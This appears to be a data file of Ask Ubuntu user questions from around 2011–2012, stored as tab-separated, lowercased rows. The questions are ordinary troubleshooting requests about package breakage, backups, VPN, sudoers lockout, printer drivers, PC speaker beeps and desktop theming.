96387	plymouth did not install properly	i was installing the plymouth manager in hopes of making a custom loading screen . while the terminal was working , my computer unexpectedly powered off . i can open up the manager and it appears to do what it is supposed to ( minus the fact that i ca n't make my own theme ) and the screen only shows on powering down . anyway , all of the advice i have seen so far have resulted in errors and nothing getting fixed . i do not have permissions to simply select the folder and delete it for some reason and i have not been able to find out how to grant myself those permissions . i guess my question then is how do i get rid of the plymouth manager so i can reinstall it properly ? already tried : -installation - http : //www.noobslab.com/2011/11/install-plymouth-manager-and-change.html -removal - how to remove plymouth boot animation manager and keep the default boot screen -permissions - how do i change my user permissions to edit /etc/apt/sources.list ? -theming guide - http : //brej.org/blog/ ? p=158
96396	how do i create multiple backup jobs using dejadup backup service ?	i 'd like to have different backup jobs scheduled at different times and frequencies ( for instance , backup my documents folder daily , but my music folder only on weekends ) , or backup daily to my local disk , and weekly to my remote server . i can see only how to set up a single backup job for a specified set of folders to a specified destination in dejadup . if there 's no way to do this in dejadup backup utility at the moment , what is my best alternative solution ?
96398	mpd wont update my library , using external drive ?	using ncmpc++ ver 0.5.6 on ubuntu 12.04 < < - epic awesomewm so thats why im using the terminal music playa ! anyway i edited the mpd.conf in /etc/mpd.conf under the music library i put /media/jake external/torrents but for w/e reason ncmpc++ still has no songs loaded in it : ( i made the /torrents directory to executable < - from a google search ! i changed the auto update to true and uncommented it then changed the auto dir depth to 5 cause its all organized ! but nothing has helped : ( what now ask ubuntu people ? !
96401	reboot on grub selection	installed ubuntu 11.10 64-bit on x79-ud5 motherboard ( 8x4gb ram , on 120gb ssd ) with gtx580 gfx card . had to do nomodeset , otherwise the installer would hang during intialisation or not load at all . after completing the installation , ubuntu restarts and loads grub menu . either selection in the grub causes the system to immediately restart and goes back to grub . any idea what 's causing this issue ?
96402	ubuntu one music - music folder wo n't sync	i 'm running ubuntu 11.10 , and just signed up for ubuntu one and ubuntu one music . generally file sync is working fine , but music has been a complete failure so far . here 's what i 'm looking at : after 24 hours , not a single mp3 or ogg file from my laptop has sync 'd to the cloud music folder . i have 4 gigs of data used , which is definitely not enough to include music files . that 's about the right amount for my docs and photos . with music , it should be more like 13 gigs . no music shows up on the ubuntu one music app on my phone , nor on the web view of my ubuntu one cloud folder i followed all the online instructions i could find . basically , on my laptop , right click on the music folder and select `` ubuntu one > synchronize this folder '' the music folder now has a green check mark on it indicating its sync'd the ubuntu one app on my laptop says `` file sync is up to date '' i did provide credit card information , and on the ubuntu one website `` music streaming '' is listed as one of my services . so what am i doing wrong ?
96403	getting openvpn to work with xfce on xubuntu ?	i 'm trying to get openvpn to work properly on my install of xubuntu 11.10 . so far , no luck . i 've successfully set this up very easily using ubuntu 11.10 so not sure why i 'm seeing issues . the base openvpn package installs fine , as does the network manager component afterwards , but i ca n't see openvpn within network manager as a valid vpn connection type . i 've already done a : sudo apt-get install openvpn followed by : sudo apt-get install network-manager-openvpn i 've restarted , and tried restarting the network manager as well . is there something i 'm missing here ? update : my search for a solution continues . i 've found this bug report which lists a configuration file that can be changed . i have n't tried this yet based on a comment in the message list that states it 's not a proper way to fix this issue .
96405	proxy setttings not working in ubuntu 11.10	i always use a proxy to connect to the internet in windows as well as in previous versions of ubuntu , but in ubuntu 11.10 it seems that the proxy settings i set in the gui are not being applied system-wide . i can access the internet in firefox with its own proxy settings . i can access internet in the terminal ( i.e . i am able to use apt-get for some small programs ) . but in ubuntu software centre or update manager it is not working .
96410	only show unity launcher when left cmd/win key is pressed ?	ive seen plenty of guides on how to prevent the launcher/sidebar from ever auto-hiding , but how would i prevent it from ever showing except when i press the left cmd/win key ?
96414	ubuntuone control panel only shows splash screen	when ubuntuone executes it shows it 's splash screen then for a moment another screen appears ( unknown ) and the splash screen replaces it again . i click on `` i already have an account '' but it appears nothing happens . ( i have an account . ) the same happens for `` join now . '' when i click on `` learn more '' that does respond with the appropriate web page . i 've uninstalled ubuntuone-installer , ubuntuone-control-panel and unbuntuone-control-panel-gtk and reinstalled them . did the uninstall and removed the folder , reinstalled . looked for a password in `` passwords and keys . '' none for ubuntuone . this works on android , windows other ubuntu 11.10 boxes but not my ubuntu 11.10 on my laptop . where do i look for conflicts/corruption ?
96417	help with installing sudo apts	any time i use alt+f2 to open command line and i type a command such as : sudo apt-get install clamav clamtk i click on it and it does n't do anything . am i not supposed to click on the icon that comes up and reboot or am i missing a step ? any help will do , thanks
96420	gimp package broken , ubuntu software centre not working	i 'm using ubuntu 11.10 and have installed gimp last night . but today , my update manager is showing that your system has broken packages and dependencies . when i try to install the gimp update that is available in the update manager , following error occurs . the package system is broken the following packages have unmet dependencies : gimp : depends : python-gtk2 ( > = 2.8.0 ) but 2.24.0-2 is installed depends : libc6 ( > = 2.11 ) but 2.13-20ubuntu5 is installed depends : libfontconfig1 ( > = 2.8.0 ) but 2.8.0-3ubuntu2 is installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but 2.24.0-1ubuntu1 is installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.30.0-0ubuntu4 is installed depends : libgtk2.0-0 ( > = 2.20.0 ) but 2.24.6-0ubuntu5 is installed depends : libjpeg62 ( > = 6b1 ) but 6b1-1ubuntu2 is installed depends : librsvg2-2 ( > = 2.14.4 ) but 2.34.1-2 is installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.3.4.dfsg-3ubuntu3 is installed depends : python ( > = 2.7.1-0ubuntu2 ) but 2.7.2-7ubuntu2 is installed then i tried to run various commands from terminal and following errors pop up . randomhero @ randomhero-inspiron-n5010 : ~ $ sudo apt-get install -f [ sudo ] password for randomhero : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gimp suggested packages : gimp-help-en gimp-help libgimp-perl gimp-gap gimp-console the following packages will be upgraded : gimp 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/4,388 kb of archives . after this operation , 324 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 213862 files and directories currently installed . ) preparing to replace gimp 2.6.11-2ubuntu4 ( using ... /gimp_2.7.4-2011102201~oo_amd64.deb ) ... unpacking replacement gimp ... dpkg : error processing /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp-plugin-registry 3.5.4-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for menu ... errors were encountered while processing : /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the update manager shows gimp update under other updates ( lp-ppa-matthaeus123-mrw-gimp-svn ) is that official repository ? do i need to remove that repository ? if yes , how ? also the ubuntu software center pops up error saying `` items can not be installed or removed until package catalog is repaired . '' when i click repair , it again gives me following error . installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory p erl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 213862 files and directories currently installed . ) preparing to replace gimp 2.6.11-2ubuntu4 ( using ... /gimp_2.7.4-2011102201~oo_amd64.deb ) ... unpacking replacement gimp ... dpkg : error processing /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp-plugin-registry 3.5.4-1 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for menu ... errors were encountered while processing : /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to remove gimp package with sudo apt-get remove gimp , but it shows following error . randomhero @ randomhero-inspiron-n5010 : ~ $ sudo apt-get remove gimp reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gimp-gmic : depends : gimp ( > = 2.6 ) but it is not going to be installed gimp-paint-studio : depends : gimp but it is not going to be installed gimp-plugin-registry : depends : gimp ( > = 2.6 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i do n't know how to go ahead and fix this error . i need to install few applications , but i ca n't because of these errors . i do n't want the gimp software as such , i just installed just in case . but i want my ubuntu software center to work . please help me , thanks in advance .
96421	identify package by window ?	i sometimes find small bugs in dialogs or windows . for instance , i found a very minor bug in the sound preference dialog . i thought i 'd report it , but it was n't obvious what package provides the dialog . is there a simple tool to do that ? i would imagine something like xwininfo ; you 'd run the command , the mouse pointer would change and when you click a window , the command returns the package name . with such a command , it would be easy to expand it to gather version information , distro and open the bug tracker on the right page . we used to have help > report a problem , but since gnome control center does n't use menus , that option is not available . this , of course , would be true for all windows that does n't use menus . so ; is there an alternative ?
96424	no ruby alternatives on 11.04 / 11.10 ?	running update-alternatives -- config ruby fails : # uname -a linux test06 2.6.38-8-virtual # 42-ubuntu smp mon apr 11 04:06:34 utc 2011 x86_64 x86_64 x86_64 gnu/linux # cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' # apt-get install ruby1.9.1-full reading package lists ... done building dependency tree reading state information ... done ruby1.9.1-full is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 25 not upgraded . # update-alternatives -- config ruby update-alternatives : error : no alternatives for ruby . # ls -l /etc/alternatives/ru* ls : can not access /etc/alternatives/ru* : no such file or directory 2 days ago ( january 15th , 2012 ) i wrote a puppet manifest that used update-alternatives to setup the correct ruby version . today , update-alternatives fails as described above . where did the ruby alternatives go ?
96427	how do i install a wimax usb driver ?	i am using wimax usb modem in ubuntu 9.04 properly . i am familiar with ubuntu 10.04 and try to install the same deb file to use my wimax usb modem , but it could not install and give me the following error message : $ sudo dpkg -i green-packet-wimax-usb_i386.iso.deb ( reading database ... 206628 files and directories currently installed . ) preparing to replace green-packet-wimax-usb 1.12 ( using green-packet-wimax- usb_i386.iso.deb ) ... /var/lib/dpkg/info/green-packet-wimax-usb.prerm : 45 : /etc/init.d/wimaxd : not found removing any system startup links for /etc/init.d/wimaxd ... fatal : module mt7118_usb_os not found . unpacking replacement green-packet-wimax-usb ... setting up green-packet-wimax-usb ( 1.12 ) ... fatal : error inserting mt7118_usb_glue ( /lib/modules/2.6.32-28-generic/kernel/drivers/net/mt7118_usb_glue.ko ) : invalid module format dpkg : error processing green-packet-wimax-usb ( -- install ) : subprocess installed post-installation script returned error exit status 1 processing triggers for ureadahead ... processing triggers for desktop-file-utils ... processing triggers for python-gmenu ... rebuilding /usr/share/applications/desktop.en_us.utf8.cache ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for python-support ... errors were encountered while processing : the error ( line 9 ) give me some clue that the mt7118_usb_glue.ko kernel object ca n't insert it . so , i think this may be due to it 's kernel dependencies . can anybody tell me how i can install this kernel object to my new ubuntu 10.04 kernel ?
96429	how to automatically reconnect after a connection is dropped ?	my problem is the same as in this question but since the question was asked months ago and nobody seems to answer , i am asking it again . i use a usb modem for connecting to internet . unluckily my connection drops frequently . every time the connection drops , i have to take the modem out , reinsert it and wait to for two minutes before it shows up in the network applet . if i manually disconnect then nothing wrong happens and the connection is listed in the applet .
96430	what happened to the `` downloaded '' filter for podcasts in banshee ?	in previous versions of banshee i could limit the view of podcast episodes to those that are already downloaded . in oneiric ( 11.10 ) i do not see this option in banshee . where did it go ?
96433	error while purging ppa from unity 5.0 testing repository	i installed unity 5.0 to test it but i am having many problems with it , for example , the lenses do n't work . but when i tried to downgrade , it did n't work . i tried : sudo ppa-purge ppa : unity-team/staging and i got the following warning : ppa to be removed : unity-team staging warning : could not find package list for ppa : unity-team staging i used the article how to install unity 5.0 in ubuntu 11.10 to install unity 5.0 . how can i downgrade from unity 5.0 ? thanks !
96435	how do i get a brother mfc 230c printer working ?	after my connecting my brother mfc 230c printer , ubuntu searched for drivers and recommended savin 230c driver . it installed . however , when i ask for a test print or if i try printing anything , my computer tells me that that the print job has been processed and completed . however , my printer is not printing anything physically . any suggestions ?
96436	starting sshd on first connection to port 22 with upstart 's new socket bridge	recent upstart has these new fancy systemd-like features of starting jobs on incoming connection via socket-bridge . i 'd like to start my sshd upon first connection to port 22 . i now have : start on socket proto=inet port=22 in my ssh.conf and i have upstart-socket-bridge and upstart-udev-bridge jobs running . the ssh job starts ok when i connect to my box on port 22 but sshd does n't talk back to me . its as if it does n't receive it and can not accept it . retrying to connect will not help , even sshd is now running and should be accepting the connections normally . upstart is still messing with it ! socket event man pages say : when an incoming connection is detected , the file descriptor representing the socket is passed to the job in question to allow it to accept ( 2 ) the connection . additionally , the environment variable upstart_job will contain the name of the event ( `` socket '' ) and the environment variable upstart_fds will contain the number of the file descriptor corresponding to the listening socket . does that mean that to take advantage of this , ssh needs specific support to passing socket fd ? if that is the case , it kinda spoils all the fun : /
96439	launchpad could not import your openpgp key	quickly generated a gpg key for me : quickly share get launchpad settings the authorization page : ( https : //launchpad.net/+authorize-token ? oauth_token=******* & allow_permission=desktop_integration ) should be opening in your browser . use your browser to authorize this program to access launchpad on your behalf . waiting to hear from launchpad about your decision ... launchpad connection is ok it seems you do n't have a gpg key on your computer . do you want to create one ( this may take a while ) ? y/ [ n ] : y not enough random bytes available . please do some other work to give the os a chance to collect more entropy ! ( need 282 more bytes ) *********.+++++ +++++ gpg : key **** marked as ultimately trusted gpg : checking the trustdb gpg : 3 marginal ( s ) needed , 1 complete ( s ) needed , pgp trust model gpg : depth : 0 valid : 1 signed : 0 trust : 0- , 0q , 0n , 0m , 0f , 1u your gpg key has been create . you have to upload it to launchpad . guidance is provided in launchpad help . press any key once done but when i paste fingerprint to lauchpad , it says : launchpad could not import your openpgp key did you enter your complete fingerprint correctly ? ( help with fingerprints ) is your key in the ubuntu keyserver yet ? you may have to wait between ten minutes ( if you pushed directly to the ubuntu key server ) and one hour ( if you pushed your key to another server ) . ( help with publishing keys ) i tried with both , fingerprint from passwords and keys ( gui ) and one from gpg -- fingerprint and still same error . i noticed one from gui have one blank space more then one pasted from cli . i waited more then 16 hours , but still getting same error ? any idea ?
96441	how can i increase internet speed	i use ubuntu 11.10 , and i connect internet via a ethernet card . i have problem about very slow internet speeds . the manager at my work place tried to slow down the internet speed but when i use windows with some download manager the internet speed is really good enough or when i test the speed of internet my results are good . how can i do ? could you help me please ?
96449	ubuntu 11.10 resource hog ?	ever since i updated to ubuntu 11.10 my computer has been getting hot and seems like the resources have been more hogged causing my computer to constantly sound like its doing something intense . i 've disabled unity and am using gnome session fallback . is there anyone else with this issue ? best way to explain this is that i feel as if 11.10 is using a lot more resources than 11.04 did - and i would like to know of a way to make it run smoother and less of a hog
96452	problem while updating	when i try to do the system update i get this : failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/l/language-pack-en/language-pack-en_11.10+20111121_all.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/l/language-pack-gnome-en/language-pack-gnome-en_11.10+20111121_all.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/n/nautilus/libnautilus-extension1_3.2.1-0ubuntu3.1_i386.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/n/nautilus/nautilus-data_3.2.1-0ubuntu3.1_all.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/n/nautilus/nautilus_3.2.1-0ubuntu3.1_i386.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/b/banshee/banshee_2.2.1-1ubuntu2_i386.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/b/banshee/banshee-extension-soundmenu_2.2.1-1ubuntu2_i386.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/u/ubuntuone-client/libsyncdaemon-1.0-1_2.0.0-0ubuntu2.2_i386.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/u/ubuntuone-client/ubuntuone-client_2.0.0-0ubuntu2.2_all.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/u/ubuntuone-client/python-ubuntuone-client_2.0.0-0ubuntu2.2_all.deb 404 not found failed to fetch http : //rs.archive.ubuntu.com/ubuntu/pool/main/b/banshee/banshee-extension-ubuntuonemusicstore_2.2.1-1ubuntu2_i386.deb 404 not found how do i fix this ?
96457	/msg alternative in empathy messanger	i was trying to join a chat room in freenode . the freenode faq says to use /msg nickserv register < password > < email > to register an account . i 'm using empathy messenger . it says /msg is not a valid command . any idea ? is there an alternative for for /msg in empathy ?
96466	how do i export both my private and public keys into one file ?	i need help on exporting both private keys and public located in ssh into one file . id_rsa and id_rsa.pub
96472	where does quickly get the ppa name from ?	i am trying to publish an app with quickly : $ quickly share get launchpad settings launchpad connection is ok ppa : umpirsky : ppa does not exist . please create it on launchpad if you want to push a package to it . umpirsky has the following ppas available : revision-monitor - revision monitor you can temporary choose one of them with -- ppa switch or definitely by executing 'quickly configure ppa < ppa_name > ' . error : share command failed aborting but it uses a wrong ppa name : it takes umpirsky , and i want revision-monitor . how can i change this ?
96473	best way to install mythtv ?	i 've got a windows media center pc at the moment , but i would like to change to ubuntu ... if i can make it work . this related topic recommends that i use mythtv , and from that i have a new question : given that i have a working windows machine that i want to keep as a fall-back , would installing wubi with the mythbuntu choice be the simplest way to get a fully working ubuntu-based media center ? note that this computer is not just for watching dvd 's -- i want to watch live tv and schedule recordings from live tv . i receive ~40 analog channels and 4 digital ( dvb-t ) channels through the same antenna cable on a single tv card . this works fine in windows and i hope that ubuntu / mythtv can handle that too .
96474	change password for gnome-keyring 3.2.2 in lubuntu	how do i change gnome-keyring password in lubuntu 11.04 ? gnome-keyring did not prompt me to choose a password when i used the application for the first time . the default password is the same as my login . i would like to change it and make it stronger .
96478	which application is responsible for accepting passwords when entered in diffrent keyboard layout ?	i just noticed that when i 'm prompted to enter my password to unlock the system , no matter what layout i choose ( persian or english ) as long as i press same buttons that resembles my password in us layout it lets me in . for example if my password is salam and i enter سشمشپ it will let me in . but when i sudo something i should enter password in correct layout . the question is which part of the os is responsible for this ? and is it really a feature or a bug ?
96482	plymouth themes	ola pessoal eu sou novato em linux mais ja entendo muita coisa quero aprender a custumizar uma distro deste a interface ao mais além . mais o que me traz aqui é o seguinte quais são os passo que eu devo seguir para desenvolver um tema com plymouth e gtk criar os meus proprios usplash , boot splash personalizar as cores das janelas e alterar o lightdm outro ponto que linguagem de programação eu devo saber para se adpatar melhor ? hello guys i 'm new to linux already understand a lot more i want to learn this distro customiser an interface to the beyond . more of what brings me here is the following . what are the steps i should follow to develop a theme with gtk plymouth and create my own usplash , boot splash customize the colors of the windows and change the lightdm ? another point which programming language should i learn to adapt better ?
96483	mount < pendrive > /home as /home/ubuntu in live usb ubuntu	i have created a customised version of ubuntu ( basically i just installed the programs that i want ) , using uck , to install on a pendrive and carry with me while travelling and boot on whatever computer is available . what i want is to have a `` home '' folder on the pendrive and then mount it as /home/ubuntu in the live system . that way , i can easily access my files from other systems as well as the pendrive , and the settings for the screen , etc will be reset every time i boot and wo n't cause problems when i use it on multiple machines .
96485	messed up visudo - ca n't edit the file anymore	i really did some very stupid stuff . i did a sudo visudo and wanted to add the following line : % admin all = nopasswd : /bin/tar so users can execute /bin/tar without the need to sudo . but stupid me replaced the line % admin all = ( all ) all so basically that means i 'm totally locked out . everytime i try a sudo visudo i get '' sorry , user admin is not allowed to execute '/usr/sbin/visudo ' as root on myhost '' i only can tar . great . is there any way to get my root rights back ?
96495	is it possible to install software from hard disk ?	i have try to install a software name qubee wimax uh-235 driver from hard disk but i failed to install . why ? i do n't know . also i do n't know how to install software by using terminal . any one please help me ? and i do n't have any internet connection in ubuntu so how can i update my software without internet connection and install other software ? please help me ?
96497	what can i use to manage pwa ( password agent ) files ?	our company has been moving from windows to ubuntu ... everything is wonderful ... but we have a database of passwords stored in password agent ... and i do not now how to move the database password in ubuntu ... ( pwa file )
96498	how to set console tty1 to cp437 ?	when i do dpkg-reconfigure console-setup there is n't the cp437 , how can i enable it ? i 've installed the console-data package , put the acm cp437 on the /etc/default/console-setup , rebooted and run setupcon and run my application , but nothing happens .
96499	how do i share a folder to the public ?	i have ubuntu one installed in my windows 7 desktop . i want to share a folder with a few friends who do not have an account in ubuntu one and do n't want to create one as well .
96502	is there an equivalent of rdp ?	the `` desktop sharing '' settings that come installed by default seem to use vnc . vnc is a bit of a bandwidth hog , can only work at the resolution of whatever screen is attached to the host , and mirrors every action on the host . ( it also seems to work poorly with compositing , but maybe that 's been fixed . ) i know about x tunnelling , but that 's annoying to use and does n't always work properly ( or , more accurately , some apps do n't work properly ) . is there any kind of protocol in between the two , similar to rdp used for windows ? specifically , something that can run at a different resolution to the host screen and is a little lighter on the network ? ( ideally , the more the protocol could have in common with rdp , the better . )
96507	is it possible to create a wolframalpha lens for unity	is it possible to create a wolfram|alpha search lens for unity . it would be of great use for many ( especially students ) . http : //products.wolframalpha.com/developers/
96511	getting the pc speaker to beep	there has been much written on getting the beep sound from ubuntu releases over the years . example : fixing the beep my needs are slightly different in that i do not want to ensure sound card beeps are functioning . instead , i want pc speaker beeps , the kind produced by the original built-in speaker because i believe they will produce less cpu load . i have confirmed that my computer has the pc speaker by unplugging the external speakers and shutting down ubuntu . at some point in the shutdown and restart process a beep is heard even though the external speakers have no power . i have tried the following : in /etc/modprobe.d/blacklist.conf , turn these lines into comments : # blacklist snd_pcsp # blacklist pcspkr in .bashrc /usr/bin/xset b on /usr/bin/xset b 100 enable in the gnome terminal : edit > profile prefs > general > terminal bell ensure no `` mute '' selections in : system > prefs > sound > various tabs ( uncheck them all ) . select `` enable window and button sounds '' in : system > prefs > sound > sound effects in gconf-editor desktop > gnome > sound , select the three sound check boxes . in gconf-editor apps > metacity > general select the audible bell check box . still i get no pc speaker beeps when i send code 7 to the console via my java program or use echo -e '\a' on the bash command line . what else should i try ? update since my goal is to minimize load on the cpu , here is a comparison of elapsed times . each test is for 100,000 iterations . each variant was performed three times so three results are presented for each . printwriter.format ( `` % c '' , 7 ) ; // 1.3 seconds , 1.5 seconds , 1.5 seconds toolkit.getdefaulttoolkit ( ) .beep ( ) ; // 0.8 seconds , 0.3 seconds , 0.5 seconds try { runtime.getruntime ( ) .exec ( `` beep '' ) ; } catch ( ioexception e ) { } // 10.3 seconds , 16.3 seconds , 11.4 seconds these runs were done inside eclipse so multiply by some value less than 1 for standalone execution . unfortunately , toolkit 's beep is silent on my computer and so is code 7 . the beep utility works but has the most cost .
96512	php shell_exec ( ) in ubuntu	i am using ubuntu with libreoffice . i have installed unoconv for convert a *.odp file to *.pdf . when i run the command unoconv -f pdf myfile.odp from terminal then it works very fine . i want to do the same thing with using php shell_exec ( ) method . so , i wrote the following code : $ output = shell_exec ( 'unoconv -f pdf test.odp 2 > & 1 ' ) ; echo $ output ; but it shows the following error : /usr/bin/python : /opt/lampp/lib/libz.so.1 : no version information available ( required by /usr/bin/python ) traceback ( most recent call last ) : file `` /usr/bin/unoconv '' , line 24 , in import uno , unohelper file `` /usr/lib/python2.7/dist-packages/uno.py '' , line 34 , in import pyuno systemerror : dynamic module not initialized properly how can i solve this problem ? thanks in advance .
96516	how can i cache specific web pages for offline viewing ?	i occassionally need to work offline by accident or design . i 'd like to maintain a flexible list of web pages that i can cache for easy offline access . notes : i 'd like to simulate online browsing as closely as possible . so instructions on using `` offline mode '' for chrome/ium ( preferable ) or firefox would be best . or an extension for one of those browsers . but , any application will do . for example , i do n't use epiphany but if it 's easiest to set up this cache in epiphany , then epiphany will become my offline browser : ) ideally i want to maintain a short list of urls , and cache them plus every link on them ( just 1 link deep will do ) . i would then maintain the web pages at the root urls via various web applications . some of these apps require authentication , so being able to store cookies is also important . but , i do n't mind having to manually open application x every day to get enter these passwords and store the cache .
96517	install agp driver on my fujitsu v6555 laptop using ubuntu 11.10	my laptop came with windows7 home basic operating system but i am interested for on ubuntu . i downloaded ubuntu 11.10 and tried to install it using dual boot . i faced a problem with installing it , i solved it using f6 key . after the installation it rebooted . while booting , i see that my screen is froze . any ways , i hit my power button and started again using recovery mode . whenever i use normal mode , i face this problem . after a week i have learned that my laptop has two agp card , one is a 12 mb and other 512 mb . 12 mb is installed normally but 512 mb agp requires a driver . i downloaded this driver to my hard disk in .run format . so , please tell me how to install it ? agp card model is : nvidia geforce 8200m g anyone please help me .
96519	how do i stop the installer putting invalid entries in my /etc/hosts file ?	i have a number of hardy hosts that seem to get an invalid hostname placed in their /etc/hosts during the installation process . there 's a line in /etc/hosts on a freshly built , unmodified host that looks like this 127.0.1.1 hostname.subdomain.domain.subdomain.domain hostname.subdomain.domain the first hostname in that list is invalid . this causes problems when programs run hostname -f or an equivalent and get `` hostname.subdomain.domain.subdomain.domain '' which is an invalid , unresolvable hostname . uname -n returns `` hostname.subdomain.domain '' on lucid hosts , the entries look like this : 127.0.1.1 hostname.subdomain.domain hostname which is pretty much what i was expecting and would like to happen . both our hardy and lucid machines are built via pxeboot and pressed files . i 've scanned through our preseed config for : anything that looks it might change the hostname anything that might change /etc/hosts i 've not found anything . it is possible for me to manipulate /etc/hosts en masse via puppet , but i would much prefer to understand the cause of the problem and fix it at source .
96522	using a fat32 partition for a swapfile	i have installed ubuntu 11 onto a 30gb ssd ( 10 & 17gb partitions - / and /home respectively ) with a 1tb and 2tb disk drive for data/large programs and i did not want to subject the ssd to swap activity when i installed ubuntu over the c & d drive volumes used by my previous win2k setup ( assuming i 'd be able to create a seperate swapfile on the first logical 10gb fat32 volume at the very start of the 1tb drive alongside the pagefile.sys windows swapfile ) . googling for info on setting up a swapfile , it 's not clear whether or not i can do this and i would like to know if i have to edit the disk drive partitions to create a dedicated swap partition ( in which case , is it possible or even recommended to have mixed fs types , such as a 4gb swap preceeding a 1 or 2 tb logical ntfs volume ? ) . i 'm asking because i plan to run win2k and winxp vms using virtualbox and want to retain the ntfs and fat32 disk volumes intact as much as possible . tia , johnny-b-good
96523	why does it take a long time to copy files to thumb drives ?	i 'm using ubuntu 11.10 64bit . since a few days , when i try to copy not so large ( about 700mb ) files to my thumb drive it copies all the data except for last few mbs very fast and keep holding when it has about 3mbs to go . sometimes in a few minutes the coping get finished but sometimes it wo n't go any further . please help ! ! !
96525	install ubuntu 10.04 on ich6r raid 1	i have a machine running win7 in raid 1 mirror array . i want to install ubuntu 10.04 along win on this machine . can someone point me in the right direction . will ubuntu recognize this automatically ? is there some commands to run ? thanks !
96526	gnome shell theme problem on ubuntu 11.10	i am trying to install anewstart gnome shell themes on ubuntu 11.10 . i have installed gnome shell extension for themes : sudo add-apt-repository ppa : webupd8team/gnome3 sudo apt-get update sudo apt-get install gnome-shell-extensions-user-theme i got the instructions from here anewstart gnome shell theme + awoken icons theme = pure art . but when i go to `` advanced settings - > shell extensions '' its empty ... there is nothing . also there is a orange triangle sign next to shell theme drop down in advanced settings - > theme . when i try to run the gnome-tweak-tool from terminal i get following error : imresh @ imresh-laptop : ~ $ gnome-tweak-tool critical : error parsing schema org.gnome.shell ( /usr/share/glib-2.0/schemas/org.gnome.shell.gschema.xml ) traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/gsettings.py '' , line 45 , in __init__ summary = key.getelementsbytagname ( `` summary '' ) [ 0 ] .childnodes [ 0 ] .data indexerror : list index out of range warning : error detecting shell traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 145 , in __init__ shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 123 , in __init__ v = map ( int , proxy.version.split ( `` . '' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 46 , in version return json.loads ( self.execute_js ( 'const config = imports.misc.config ; config.package_version ' ) ) file '' /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 39 , in execute_js result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : 